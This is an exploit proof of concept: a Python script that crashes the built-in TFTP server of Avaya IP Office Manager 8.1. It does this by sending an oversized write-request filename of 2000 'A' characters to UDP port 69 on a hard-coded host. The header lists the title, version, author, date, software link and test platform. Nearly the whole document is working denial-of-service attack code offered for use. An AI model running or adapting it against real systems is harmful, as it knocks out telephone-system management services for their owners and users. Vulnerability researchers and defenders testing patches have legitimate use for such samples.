#Exploit Title: Avaya IP Office Manager TFTP DOS#Version: Avaya IP Office Manager 8.1 (5)#Author: Craig Freyman (cd1zz)#Date: March 23, 2011#Description: Avaya IP Office Manager is the management console for Avaya IP Office phone systems. #There is a built in TFTP server that is used to update the firmware on phones. The TFTP service #is loaded when the admin console is opened. I was not able to overwrite any registers or the SEH.#Software Link: ftp://ftp.avaya.com/incoming/Up1cku9/SoftwarePub/6_1GA_Builds/ADMIN6_1_5.exe#Tested on: Windows XP SP3#!/usr/bin/python
import socket
host = '192.168.133.131'
port = 69
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
crash = "A"* 2000
print "Sending crash...."
pwned = "\x00\x02"+"A"+"\x00"+ crash +"\x00"
s.sendto(pwned,(host, port))